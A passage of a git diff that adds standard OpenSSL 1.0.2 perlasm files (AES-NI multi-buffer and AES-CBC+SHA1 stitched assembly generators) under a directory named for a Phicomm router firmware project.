+	.rva	.LSEH_begin_aesni_multi_cbc_decrypt_avx
+	.rva	.LSEH_end_aesni_multi_cbc_decrypt_avx
+	.rva	.LSEH_info_aesni_multi_cbc_decrypt_avx
+___
+$code.=<<___;
+.section	.xdata
+.align	8
+.LSEH_info_aesni_multi_cbc_encrypt:
+	.byte	9,0,0,0
+	.rva	se_handler
+	.rva	.Lenc4x_body,.Lenc4x_epilogue		# HandlerData[]
+.LSEH_info_aesni_multi_cbc_decrypt:
+	.byte	9,0,0,0
+	.rva	se_handler
+	.rva	.Ldec4x_body,.Ldec4x_epilogue		# HandlerData[]
+___
+$code.=<<___ if ($avx);
+.LSEH_info_aesni_multi_cbc_encrypt_avx:
+	.byte	9,0,0,0
+	.rva	se_handler
+	.rva	.Lenc8x_body,.Lenc8x_epilogue		# HandlerData[]
+.LSEH_info_aesni_multi_cbc_decrypt_avx:
+	.byte	9,0,0,0
+	.rva	se_handler
+	.rva	.Ldec8x_body,.Ldec8x_epilogue		# HandlerData[]
+___
+}
+####################################################################
+
+sub rex {
+  local *opcode=shift;
+  my ($dst,$src)=@_;
+  my $rex=0;
+
+    $rex|=0x04			if($dst>=8);
+    $rex|=0x01			if($src>=8);
+    push @opcode,$rex|0x40	if($rex);
+}
+
+sub aesni {
+  my $line=shift;
+  my @opcode=(0x66);
+
+    if ($line=~/(aeskeygenassist)\s+\$([x0-9a-f]+),\s*%xmm([0-9]+),\s*%xmm([0-9]+)/) {
+	rex(\@opcode,$4,$3);
+	push @opcode,0x0f,0x3a,0xdf;
+	push @opcode,0xc0|($3&7)|(($4&7)<<3);	# ModR/M
+	my $c=$2;
+	push @opcode,$c=~/^0/?oct($c):$c;
+	return ".byte\t".join(',',@opcode);
+    }
+    elsif ($line=~/(aes[a-z]+)\s+%xmm([0-9]+),\s*%xmm([0-9]+)/) {
+	my %opcodelet = (
+		"aesimc" => 0xdb,
+		"aesenc" => 0xdc,	"aesenclast" => 0xdd,
+		"aesdec" => 0xde,	"aesdeclast" => 0xdf
+	);
+	return undef if (!defined($opcodelet{$1}));
+	rex(\@opcode,$3,$2);
+	push @opcode,0x0f,0x38,$opcodelet{$1};
+	push @opcode,0xc0|($2&7)|(($3&7)<<3);	# ModR/M
+	return ".byte\t".join(',',@opcode);
+    }
+    elsif ($line=~/(aes[a-z]+)\s+([0x1-9a-fA-F]*)\(%rsp\),\s*%xmm([0-9]+)/) {
+	my %opcodelet = (
+		"aesenc" => 0xdc,	"aesenclast" => 0xdd,
+		"aesdec" => 0xde,	"aesdeclast" => 0xdf
+	);
+	return undef if (!defined($opcodelet{$1}));
+	my $off = $2;
+	push @opcode,0x44 if ($3>=8);
+	push @opcode,0x0f,0x38,$opcodelet{$1};
+	push @opcode,0x44|(($3&7)<<3),0x24;	# ModR/M
+	push @opcode,($off=~/^0/?oct($off):$off)&0xff;
+	return ".byte\t".join(',',@opcode);
+    }
+    return $line;
+}
+
+$code =~ s/\`([^\`]*)\`/eval($1)/gem;
+$code =~ s/\b(aes.*%xmm[0-9]+).*$/aesni($1)/gem;
+
+print $code;
+close STDOUT;
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/asm/aesni-sha1-x86_64.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/asm/aesni-sha1-x86_64.pl
new file mode 100644
index 0000000..97992ad
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/asm/aesni-sha1-x86_64.pl
@@ -0,0 +1,2057 @@
+#!/usr/bin/env perl
+#
+# ====================================================================
+# Written by Andy Polyakov <appro@openssl.org> for the OpenSSL
+# project. The module is, however, dual licensed under OpenSSL and
+# CRYPTOGAMS licenses depending on where you obtain it. For further
+# details see http://www.openssl.org/~appro/cryptogams/.
+# ====================================================================
+#
+# June 2011
+#
+# This is AESNI-CBC+SHA1 "stitch" implementation. The idea, as spelled
+# in http://download.intel.com/design/intarch/papers/323686.pdf, is
+# that since AESNI-CBC encrypt exhibit *very* low instruction-level
+# parallelism, interleaving it with another algorithm would allow to
+# utilize processor resources better and achieve better performance.
+# SHA1 instruction sequences(*) are taken from sha1-x86_64.pl and
+# AESNI code is weaved into it. Below are performance numbers in
+# cycles per processed byte, less is better, for standalone AESNI-CBC
+# encrypt, sum of the latter and standalone SHA1, and "stitched"
+# subroutine:
+#
+#		AES-128-CBC	+SHA1		stitch      gain
+# Westmere	3.77[+5.3]	9.07		6.55	    +38%
+# Sandy Bridge	5.05[+5.0(6.1)]	10.06(11.15)	5.98(7.05)  +68%(+58%)
+# Ivy Bridge	5.05[+4.6]	9.65		5.54        +74%
+# Haswell	4.43[+3.6(4.2)]	8.00(8.58)	4.55(5.21)  +75%(+65%)
+# Bulldozer	5.77[+6.0]	11.72		6.37        +84%
+#
+#		AES-192-CBC
+# Westmere	4.51		9.81		6.80	    +44%
+# Sandy Bridge	6.05		11.06(12.15)	6.11(7.19)  +81%(+69%)
+# Ivy Bridge	6.05		10.65		6.07        +75%
+# Haswell	5.29		8.86(9.44)	5.32(5.32)  +67%(+77%)
+# Bulldozer	6.89		12.84		6.96        +84%
+#
+#		AES-256-CBC
+# Westmere	5.25		10.55		7.21	    +46%
+# Sandy Bridge	7.05		12.06(13.15)	7.12(7.72)  +69%(+70%)
+# Ivy Bridge	7.05		11.65		7.12        +64%
+# Haswell	6.19		9.76(10.34)	6.21(6.25)  +57%(+65%)
+# Bulldozer	8.00		13.95		8.25        +69%
+#
+# (*)	There are two code paths: SSSE3 and AVX. See sha1-568.pl for
+#	background information. Above numbers in parentheses are SSSE3
+#	results collected on AVX-capable CPU, i.e. apply on OSes that
+#	don't support AVX.
+#
+# Needless to mention that it makes no sense to implement "stitched"
+# *decrypt* subroutine. Because *both* AESNI-CBC decrypt and SHA1
+# fully utilize parallelism, so stitching would not give any gain
+# anyway. Well, there might be some, e.g. because of better cache
+# locality... For reference, here are performance results for
+# standalone AESNI-CBC decrypt:
+#
+#		AES-128-CBC	AES-192-CBC	AES-256-CBC
+# Westmere	1.25		1.50		1.75
+# Sandy Bridge	0.74		0.91		1.09
+# Ivy Bridge	0.74		0.90		1.11
+# Haswell	0.63		0.76		0.88
+# Bulldozer	0.70		0.85		0.99
+
+# And indeed:
+#
+#		AES-256-CBC	+SHA1		stitch      gain
+# Westmere	1.75		7.20		6.68        +7.8%
+# Sandy Bridge	1.09		6.09(7.22)	5.82(6.95)  +4.6%(+3.9%)
+# Ivy Bridge	1.11		5.70		5.45        +4.6%
+# Haswell	0.88		4.45(5.00)	4.39(4.69)  +1.4%(*)(+6.6%)
+# Bulldozer	0.99		6.95		5.95        +17%(**)
+#
+# (*)	Tiny improvement coefficient on Haswell is because we compare
+#	AVX1 stitch to sum with AVX2 SHA1.
+# (**)	Execution is fully dominated by integer code sequence and
+#	SIMD still hardly shows [in single-process benchmark;-]
+
+$flavour = shift;
+$output  = shift;
+if ($flavour =~ /\./) { $output = $flavour; undef $flavour; }
+
+$win64=0; $win64=1 if ($flavour =~ /[nm]asm|mingw64/ || $output =~ /\.asm$/);
+
+$0 =~ m/(.*[\/\\])[^\/\\]+$/; $dir=$1;
+( $xlate="${dir}x86_64-xlate.pl" and -f $xlate ) or
+( $xlate="${dir}../../perlasm/x86_64-xlate.pl" and -f $xlate) or
+die "can't locate x86_64-xlate.pl";
+
+$avx=1 if (`$ENV{CC} -Wa,-v -c -o /dev/null -x assembler /dev/null 2>&1`
+		=~ /GNU assembler version ([2-9]\.[0-9]+)/ &&
+	   $1>=2.19);
+$avx=1 if (!$avx && $win64 && ($flavour =~ /nasm/ || $ENV{ASM} =~ /nasm/) &&
+	   `nasm -v 2>&1` =~ /NASM version ([2-9]\.[0-9]+)/ &&
+	   $1>=2.09);
+$avx=1 if (!$avx && $win64 && ($flavour =~ /masm/ || $ENV{ASM} =~ /ml64/) &&
+	   `ml64 2>&1` =~ /Version ([0-9]+)\./ &&
+	   $1>=10);
+$avx=1 if (!$avx && `$ENV{CC} -v 2>&1` =~ /(^clang version|based on LLVM) ([3-9]\.[0-9]+)/ && $2>=3.0);
+
+$shaext=1;	### set to zero if compiling for 1.0.1
+
+$stitched_decrypt=0;
+
+open OUT,"| \"$^X\" $xlate $flavour $output";
+*STDOUT=*OUT;
+
+# void aesni_cbc_sha1_enc(const void *inp,
+#			void *out,
+#			size_t length,
+#			const AES_KEY *key,
+#			unsigned char *iv,
+#			SHA_CTX *ctx,
+#			const void *in0);
+
+$code.=<<___;
+.text
+.extern	OPENSSL_ia32cap_P
+
+.globl	aesni_cbc_sha1_enc
+.type	aesni_cbc_sha1_enc,\@abi-omnipotent
+.align	32
+aesni_cbc_sha1_enc:
+	# caller should check for SSSE3 and AES-NI bits
+	mov	OPENSSL_ia32cap_P+0(%rip),%r10d
+	mov	OPENSSL_ia32cap_P+4(%rip),%r11
+___
+$code.=<<___ if ($shaext);
+	bt	\$61,%r11		# check SHA bit
+	jc	aesni_cbc_sha1_enc_shaext
+___
+$code.=<<___ if ($avx);
+	and	\$`1<<28`,%r11d		# mask AVX bit
+	and	\$`1<<30`,%r10d		# mask "Intel CPU" bit
+	or	%r11d,%r10d
+	cmp	\$`1<<28|1<<30`,%r10d
+	je	aesni_cbc_sha1_enc_avx
+___
+$code.=<<___;
+	jmp	aesni_cbc_sha1_enc_ssse3
+	ret
+.size	aesni_cbc_sha1_enc,.-aesni_cbc_sha1_enc
+___
+
+my ($in0,$out,$len,$key,$ivp,$ctx,$inp)=("%rdi","%rsi","%rdx","%rcx","%r8","%r9","%r10");
+
+my $Xi=4;
+my @X=map("%xmm$_",(4..7,0..3));
+my @Tx=map("%xmm$_",(8..10));
+my @V=($A,$B,$C,$D,$E)=("%eax","%ebx","%ecx","%edx","%ebp");	# size optimization
+my @T=("%esi","%edi");
+my $j=0; my $jj=0; my $r=0; my $sn=0; my $rx=0;
+my $K_XX_XX="%r11";
+my ($rndkey0,$iv,$in)=map("%xmm$_",(11..13));			# for enc
+my @rndkey=("%xmm14","%xmm15");					# for enc
+my ($inout0,$inout1,$inout2,$inout3)=map("%xmm$_",(12..15));	# for dec
+
+if (1) {	# reassign for Atom Silvermont
+    # The goal is to minimize amount of instructions with more than
+    # 3 prefix bytes. Or in more practical terms to keep AES-NI *and*
+    # SSSE3 instructions to upper half of the register bank.
+    @X=map("%xmm$_",(8..11,4..7));
+    @Tx=map("%xmm$_",(12,13,3));
+    ($iv,$in,$rndkey0)=map("%xmm$_",(2,14,15));
+    @rndkey=("%xmm0","%xmm1");
+}
+
+sub AUTOLOAD()		# thunk [simplified] 32-bit style perlasm
+{ my $opcode = $AUTOLOAD; $opcode =~ s/.*:://;
+  my $arg = pop;
+    $arg = "\$$arg" if ($arg*1 eq $arg);
+    $code .= "\t$opcode\t".join(',',$arg,reverse @_)."\n";
+}
+
+my $_rol=sub { &rol(@_) };
+my $_ror=sub { &ror(@_) };
+
+$code.=<<___;
+.type	aesni_cbc_sha1_enc_ssse3,\@function,6
+.align	32
+aesni_cbc_sha1_enc_ssse3:
+	mov	`($win64?56:8)`(%rsp),$inp	# load 7th argument
+	#shr	\$6,$len			# debugging artefact
+	#jz	.Lepilogue_ssse3		# debugging artefact
+	push	%rbx
+	push	%rbp
+	push	%r12
+	push	%r13
+	push	%r14
+	push	%r15
+	lea	`-104-($win64?10*16:0)`(%rsp),%rsp
+	#mov	$in0,$inp			# debugging artefact
+	#lea	64(%rsp),$ctx			# debugging artefact
+___
+$code.=<<___ if ($win64);
+	movaps	%xmm6,96+0(%rsp)
+	movaps	%xmm7,96+16(%rsp)
+	movaps	%xmm8,96+32(%rsp)
+	movaps	%xmm9,96+48(%rsp)
+	movaps	%xmm10,96+64(%rsp)
+	movaps	%xmm11,96+80(%rsp)
+	movaps	%xmm12,96+96(%rsp)
+	movaps	%xmm13,96+112(%rsp)
+	movaps	%xmm14,96+128(%rsp)
+	movaps	%xmm15,96+144(%rsp)
+.Lprologue_ssse3:
+___
+$code.=<<___;
+	mov	$in0,%r12			# reassign arguments
+	mov	$out,%r13
+	mov	$len,%r14
+	lea	112($key),%r15			# size optimization
+	movdqu	($ivp),$iv			# load IV
+	mov	$ivp,88(%rsp)			# save $ivp
+___
+($in0,$out,$len,$key)=map("%r$_",(12..15));	# reassign arguments
+my $rounds="${ivp}d";
+$code.=<<___;
+	shl	\$6,$len
+	sub	$in0,$out
+	mov	240-112($key),$rounds
+	add	$inp,$len		# end of input
+
+	lea	K_XX_XX(%rip),$K_XX_XX
+	mov	0($ctx),$A		# load context
+	mov	4($ctx),$B
+	mov	8($ctx),$C
+	mov	12($ctx),$D
+	mov	$B,@T[0]		# magic seed
+	mov	16($ctx),$E
+	mov	$C,@T[1]
+	xor	$D,@T[1]
+	and	@T[1],@T[0]
+
+	movdqa	64($K_XX_XX),@Tx[2]	# pbswap mask
+	movdqa	0($K_XX_XX),@Tx[1]	# K_00_19
+	movdqu	0($inp),@X[-4&7]	# load input to %xmm[0-3]
+	movdqu	16($inp),@X[-3&7]
+	movdqu	32($inp),@X[-2&7]
+	movdqu	48($inp),@X[-1&7]
+	pshufb	@Tx[2],@X[-4&7]		# byte swap
+	pshufb	@Tx[2],@X[-3&7]
+	pshufb	@Tx[2],@X[-2&7]
+	add	\$64,$inp
+	paddd	@Tx[1],@X[-4&7]		# add K_00_19
+	pshufb	@Tx[2],@X[-1&7]
+	paddd	@Tx[1],@X[-3&7]
+	paddd	@Tx[1],@X[-2&7]
+	movdqa	@X[-4&7],0(%rsp)	# X[]+K xfer to IALU
+	psubd	@Tx[1],@X[-4&7]		# restore X[]
+	movdqa	@X[-3&7],16(%rsp)
+	psubd	@Tx[1],@X[-3&7]
+	movdqa	@X[-2&7],32(%rsp)
+	psubd	@Tx[1],@X[-2&7]
+	movups	-112($key),$rndkey0	# $key[0]
+	movups	16-112($key),$rndkey[0]	# forward reference
+	jmp	.Loop_ssse3
+___
+
+my $aesenc=sub {
+  use integer;
+  my ($n,$k)=($r/10,$r%10);
+    if ($k==0) {
+      $code.=<<___;
+	movups		`16*$n`($in0),$in		# load input
+	xorps		$rndkey0,$in
+___
+      $code.=<<___ if ($n);
+	movups		$iv,`16*($n-1)`($out,$in0)	# write output
+___
+      $code.=<<___;
+	xorps		$in,$iv
+	movups		`32+16*$k-112`($key),$rndkey[1]
+	aesenc		$rndkey[0],$iv
+___
+    } elsif ($k==9) {
+      $sn++;
+      $code.=<<___;
+	cmp		\$11,$rounds
+	jb		.Laesenclast$sn
+	movups		`32+16*($k+0)-112`($key),$rndkey[1]
+	aesenc		$rndkey[0],$iv
+	movups		`32+16*($k+1)-112`($key),$rndkey[0]
+	aesenc		$rndkey[1],$iv
+	je		.Laesenclast$sn
+	movups		`32+16*($k+2)-112`($key),$rndkey[1]
+	aesenc		$rndkey[0],$iv
+	movups		`32+16*($k+3)-112`($key),$rndkey[0]
+	aesenc		$rndkey[1],$iv
+.Laesenclast$sn:
+	aesenclast	$rndkey[0],$iv
+	movups		16-112($key),$rndkey[1]		# forward reference
+___
+    } else {
+      $code.=<<___;
+	movups		`32+16*$k-112`($key),$rndkey[1]
+	aesenc		$rndkey[0],$iv
+___
+    }
+    $r++;	unshift(@rndkey,pop(@rndkey));
+};
+
+sub Xupdate_ssse3_16_31()		# recall that $Xi starts wtih 4
+{ use integer;
+  my $body = shift;
+  my @insns = (&$body,&$body,&$body,&$body);	# 40 instructions
+  my ($a,$b,$c,$d,$e);
+
+	 eval(shift(@insns));		# ror
+	&pshufd	(@X[0],@X[-4&7],0xee);	# was &movdqa	(@X[0],@X[-3&7]);
+	 eval(shift(@insns));
+	&movdqa	(@Tx[0],@X[-1&7]);
+	  &paddd	(@Tx[1],@X[-1&7]);
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+
+	&punpcklqdq(@X[0],@X[-3&7]);	# compose "X[-14]" in "X[0]", was &palignr(@X[0],@X[-4&7],8);
+	 eval(shift(@insns));
+	 eval(shift(@insns));		# rol
+	 eval(shift(@insns));
+	&psrldq	(@Tx[0],4);		# "X[-3]", 3 dwords
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+
+	&pxor	(@X[0],@X[-4&7]);	# "X[0]"^="X[-16]"
+	 eval(shift(@insns));
+	 eval(shift(@insns));		# ror
+	&pxor	(@Tx[0],@X[-2&7]);	# "X[-3]"^"X[-8]"
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+
+	&pxor	(@X[0],@Tx[0]);		# "X[0]"^="X[-3]"^"X[-8]"
+	 eval(shift(@insns));
+	 eval(shift(@insns));		# rol
+	  &movdqa	(eval(16*(($Xi-1)&3))."(%rsp)",@Tx[1]);	# X[]+K xfer to IALU
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+
+	&movdqa	(@Tx[2],@X[0]);
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));		# ror
+	&movdqa	(@Tx[0],@X[0]);
+	 eval(shift(@insns));
+
+	&pslldq	(@Tx[2],12);		# "X[0]"<<96, extract one dword
+	&paddd	(@X[0],@X[0]);
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+
+	&psrld	(@Tx[0],31);
+	 eval(shift(@insns));
+	 eval(shift(@insns));		# rol
+	 eval(shift(@insns));
+	&movdqa	(@Tx[1],@Tx[2]);
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+
+	&psrld	(@Tx[2],30);
+	 eval(shift(@insns));
+	 eval(shift(@insns));		# ror
+	&por	(@X[0],@Tx[0]);		# "X[0]"<<<=1
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+
+	&pslld	(@Tx[1],2);
+	&pxor	(@X[0],@Tx[2]);
+	 eval(shift(@insns));
+	  &movdqa	(@Tx[2],eval(16*(($Xi)/5))."($K_XX_XX)");	# K_XX_XX
+	 eval(shift(@insns));		# rol
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+
+	&pxor	(@X[0],@Tx[1]);		# "X[0]"^=("X[0]">>96)<<<2
+	&pshufd (@Tx[1],@X[-1&7],0xee)	if ($Xi==7);	# was &movdqa	(@Tx[0],@X[-1&7]) in Xupdate_ssse3_32_79
+
+	 foreach (@insns) { eval; }	# remaining instructions [if any]
+
+  $Xi++;	push(@X,shift(@X));	# "rotate" X[]
+		push(@Tx,shift(@Tx));
+}
+
+sub Xupdate_ssse3_32_79()
+{ use integer;
+  my $body = shift;
+  my @insns = (&$body,&$body,&$body,&$body);	# 32 to 44 instructions
+  my ($a,$b,$c,$d,$e);
+
+	 eval(shift(@insns))		if ($Xi==8);
+	&pxor	(@X[0],@X[-4&7]);	# "X[0]"="X[-32]"^"X[-16]"
+	 eval(shift(@insns))		if ($Xi==8);
+	 eval(shift(@insns));		# body_20_39
+	 eval(shift(@insns));
+	 eval(shift(@insns))		if (@insns[1] =~ /_ror/);
+	 eval(shift(@insns))		if (@insns[0] =~ /_ror/);
+	&punpcklqdq(@Tx[0],@X[-1&7]);	# compose "X[-6]", was &palignr(@Tx[0],@X[-2&7],8);
+	 eval(shift(@insns));
+	 eval(shift(@insns));		# rol
+
+	&pxor	(@X[0],@X[-7&7]);	# "X[0]"^="X[-28]"
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	if ($Xi%5) {
+	  &movdqa	(@Tx[2],@Tx[1]);# "perpetuate" K_XX_XX...
+	} else {			# ... or load next one
+	  &movdqa	(@Tx[2],eval(16*($Xi/5))."($K_XX_XX)");
+	}
+	 eval(shift(@insns));		# ror
+	  &paddd	(@Tx[1],@X[-1&7]);
+	 eval(shift(@insns));
+
+	&pxor	(@X[0],@Tx[0]);		# "X[0]"^="X[-6]"
+	 eval(shift(@insns));		# body_20_39
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));		# rol
+	 eval(shift(@insns))		if (@insns[0] =~ /_ror/);
+
+	&movdqa	(@Tx[0],@X[0]);
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	  &movdqa	(eval(16*(($Xi-1)&3))."(%rsp)",@Tx[1]);	# X[]+K xfer to IALU
+	 eval(shift(@insns));		# ror
+	 eval(shift(@insns));
+	 eval(shift(@insns));		# body_20_39
+
+	&pslld	(@X[0],2);
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	&psrld	(@Tx[0],30);
+	 eval(shift(@insns))		if (@insns[0] =~ /_rol/);# rol
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));		# ror
+
+	&por	(@X[0],@Tx[0]);		# "X[0]"<<<=2
+	 eval(shift(@insns));
+	 eval(shift(@insns));		# body_20_39
+	 eval(shift(@insns))		if (@insns[1] =~ /_rol/);
+	 eval(shift(@insns))		if (@insns[0] =~ /_rol/);
+	  &pshufd(@Tx[1],@X[-1&7],0xee)	if ($Xi<19);	# was &movdqa	(@Tx[1],@X[0])
+	 eval(shift(@insns));
+	 eval(shift(@insns));		# rol
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));		# rol
+	 eval(shift(@insns));
+
+	 foreach (@insns) { eval; }	# remaining instructions
+
+  $Xi++;	push(@X,shift(@X));	# "rotate" X[]
+		push(@Tx,shift(@Tx));
+}
+
+sub Xuplast_ssse3_80()
+{ use integer;
+  my $body = shift;
+  my @insns = (&$body,&$body,&$body,&$body);	# 32 instructions
+  my ($a,$b,$c,$d,$e);
+
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	  &paddd	(@Tx[1],@X[-1&7]);
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+
+	  &movdqa	(eval(16*(($Xi-1)&3))."(%rsp)",@Tx[1]);	# X[]+K xfer IALU
+
+	 foreach (@insns) { eval; }		# remaining instructions
+
+	&cmp	($inp,$len);
+	&je	(shift);
+
+	unshift(@Tx,pop(@Tx));
+
+	&movdqa	(@Tx[2],"64($K_XX_XX)");	# pbswap mask
+	&movdqa	(@Tx[1],"0($K_XX_XX)");		# K_00_19
+	&movdqu	(@X[-4&7],"0($inp)");		# load input
+	&movdqu	(@X[-3&7],"16($inp)");
+	&movdqu	(@X[-2&7],"32($inp)");
+	&movdqu	(@X[-1&7],"48($inp)");
+	&pshufb	(@X[-4&7],@Tx[2]);		# byte swap
+	&add	($inp,64);
+
+  $Xi=0;
+}
+
+sub Xloop_ssse3()
+{ use integer;
+  my $body = shift;
+  my @insns = (&$body,&$body,&$body,&$body);	# 32 instructions
+  my ($a,$b,$c,$d,$e);
+
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	&pshufb	(@X[($Xi-3)&7],@Tx[2]);
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	&paddd	(@X[($Xi-4)&7],@Tx[1]);
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	&movdqa	(eval(16*$Xi)."(%rsp)",@X[($Xi-4)&7]);	# X[]+K xfer to IALU
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	&psubd	(@X[($Xi-4)&7],@Tx[1]);
+
+	foreach (@insns) { eval; }
+  $Xi++;
+}
+
+sub Xtail_ssse3()
+{ use integer;
+  my $body = shift;
+  my @insns = (&$body,&$body,&$body,&$body);	# 32 instructions
+  my ($a,$b,$c,$d,$e);
+
+	foreach (@insns) { eval; }
+}
+
+my @body_00_19 = (
+	'($a,$b,$c,$d,$e)=@V;'.
+	'&$_ror	($b,$j?7:2);',	# $b>>>2
+	'&xor	(@T[0],$d);',
+	'&mov	(@T[1],$a);',	# $b for next round
+
+	'&add	($e,eval(4*($j&15))."(%rsp)");',# X[]+K xfer
+	'&xor	($b,$c);',	# $c^$d for next round
+
+	'&$_rol	($a,5);',
+	'&add	($e,@T[0]);',
+	'&and	(@T[1],$b);',	# ($b&($c^$d)) for next round
+
+	'&xor	($b,$c);',	# restore $b
+	'&add	($e,$a);'	.'$j++; unshift(@V,pop(@V)); unshift(@T,pop(@T));'
+	);
+
+sub body_00_19 () {	# ((c^d)&b)^d
+    # on start @T[0]=(c^d)&b
+    return &body_20_39() if ($rx==19); $rx++;
+
+    use integer;
+    my ($k,$n);
+    my @r=@body_00_19;
+
+	$n = scalar(@r);
+	$k = (($jj+1)*12/20)*20*$n/12;	# 12 aesencs per these 20 rounds
+	@r[$k%$n].='&$aesenc();'	if ($jj==$k/$n);
+	$jj++;
+
+    return @r;
+}
+
+my @body_20_39 = (
+	'($a,$b,$c,$d,$e)=@V;'.
+	'&add	($e,eval(4*($j&15))."(%rsp)");',# X[]+K xfer
+	'&xor	(@T[0],$d)	if($j==19);'.
+	'&xor	(@T[0],$c)	if($j> 19);',	# ($b^$d^$c)
+	'&mov	(@T[1],$a);',	# $b for next round
+
+	'&$_rol	($a,5);',
+	'&add	($e,@T[0]);',
+	'&xor	(@T[1],$c)	if ($j< 79);',	# $b^$d for next round
+
+	'&$_ror	($b,7);',	# $b>>>2
+	'&add	($e,$a);'	.'$j++; unshift(@V,pop(@V)); unshift(@T,pop(@T));'
+	);
+
+sub body_20_39 () {	# b^d^c
+    # on entry @T[0]=b^d
+    return &body_40_59() if ($rx==39); $rx++;
+
+    use integer;
+    my ($k,$n);
+    my @r=@body_20_39;
+
+	$n = scalar(@r);
+	$k = (($jj+1)*8/20)*20*$n/8;	# 8 aesencs per these 20 rounds
+	@r[$k%$n].='&$aesenc();'	if ($jj==$k/$n && $rx!=20);
+	$jj++;
+
+    return @r;
+}
+
+my @body_40_59 = (
+	'($a,$b,$c,$d,$e)=@V;'.
+	'&add	($e,eval(4*($j&15))."(%rsp)");',# X[]+K xfer
+	'&and	(@T[0],$c)	if ($j>=40);',	# (b^c)&(c^d)
+	'&xor	($c,$d)		if ($j>=40);',	# restore $c
+
+	'&$_ror	($b,7);',	# $b>>>2
+	'&mov	(@T[1],$a);',	# $b for next round
+	'&xor	(@T[0],$c);',
+
+	'&$_rol	($a,5);',
+	'&add	($e,@T[0]);',
+	'&xor	(@T[1],$c)	if ($j==59);'.
+	'&xor	(@T[1],$b)	if ($j< 59);',	# b^c for next round
+
+	'&xor	($b,$c)		if ($j< 59);',	# c^d for next round
+	'&add	($e,$a);'	.'$j++; unshift(@V,pop(@V)); unshift(@T,pop(@T));'
+	);
+
+sub body_40_59 () {	# ((b^c)&(c^d))^c
+    # on entry @T[0]=(b^c), (c^=d)
+    $rx++;
+
+    use integer;
+    my ($k,$n);
+    my @r=@body_40_59;
+
+	$n = scalar(@r);
+	$k=(($jj+1)*12/20)*20*$n/12;	# 12 aesencs per these 20 rounds
+	@r[$k%$n].='&$aesenc();'	if ($jj==$k/$n && $rx!=40);
+	$jj++;
+
+    return @r;
+}
+$code.=<<___;
+.align	32
+.Loop_ssse3:
+___
+	&Xupdate_ssse3_16_31(\&body_00_19);
+	&Xupdate_ssse3_16_31(\&body_00_19);
+	&Xupdate_ssse3_16_31(\&body_00_19);
+	&Xupdate_ssse3_16_31(\&body_00_19);
+	&Xupdate_ssse3_32_79(\&body_00_19);
+	&Xupdate_ssse3_32_79(\&body_20_39);
+	&Xupdate_ssse3_32_79(\&body_20_39);
+	&Xupdate_ssse3_32_79(\&body_20_39);
+	&Xupdate_ssse3_32_79(\&body_20_39);
+	&Xupdate_ssse3_32_79(\&body_20_39);
+	&Xupdate_ssse3_32_79(\&body_40_59);
+	&Xupdate_ssse3_32_79(\&body_40_59);
+	&Xupdate_ssse3_32_79(\&body_40_59);
+	&Xupdate_ssse3_32_79(\&body_40_59);
+	&Xupdate_ssse3_32_79(\&body_40_59);
+	&Xupdate_ssse3_32_79(\&body_20_39);
+	&Xuplast_ssse3_80(\&body_20_39,".Ldone_ssse3");	# can jump to "done"
+
+				$saved_j=$j; @saved_V=@V;
+				$saved_r=$r; @saved_rndkey=@rndkey;
+
+	&Xloop_ssse3(\&body_20_39);
+	&Xloop_ssse3(\&body_20_39);
+	&Xloop_ssse3(\&body_20_39);
+
+$code.=<<___;
+	movups	$iv,48($out,$in0)		# write output
+	lea	64($in0),$in0
+
+	add	0($ctx),$A			# update context
+	add	4($ctx),@T[0]
+	add	8($ctx),$C
+	add	12($ctx),$D
+	mov	$A,0($ctx)
+	add	16($ctx),$E
+	mov	@T[0],4($ctx)
+	mov	@T[0],$B			# magic seed
+	mov	$C,8($ctx)
+	mov	$C,@T[1]
+	mov	$D,12($ctx)
+	xor	$D,@T[1]
+	mov	$E,16($ctx)
+	and	@T[1],@T[0]
+	jmp	.Loop_ssse3
+
+.Ldone_ssse3:
+___
+				$jj=$j=$saved_j; @V=@saved_V;
+				$r=$saved_r;     @rndkey=@saved_rndkey;
+
+	&Xtail_ssse3(\&body_20_39);
+	&Xtail_ssse3(\&body_20_39);
+	&Xtail_ssse3(\&body_20_39);
+
+$code.=<<___;
+	movups	$iv,48($out,$in0)		# write output
+	mov	88(%rsp),$ivp			# restore $ivp
+
+	add	0($ctx),$A			# update context
+	add	4($ctx),@T[0]
+	add	8($ctx),$C
+	mov	$A,0($ctx)
+	add	12($ctx),$D
+	mov	@T[0],4($ctx)
+	add	16($ctx),$E
+	mov	$C,8($ctx)
+	mov	$D,12($ctx)
+	mov	$E,16($ctx)
+	movups	$iv,($ivp)			# write IV
+___
+$code.=<<___ if ($win64);
+	movaps	96+0(%rsp),%xmm6
+	movaps	96+16(%rsp),%xmm7
+	movaps	96+32(%rsp),%xmm8
+	movaps	96+48(%rsp),%xmm9
+	movaps	96+64(%rsp),%xmm10
+	movaps	96+80(%rsp),%xmm11
+	movaps	96+96(%rsp),%xmm12
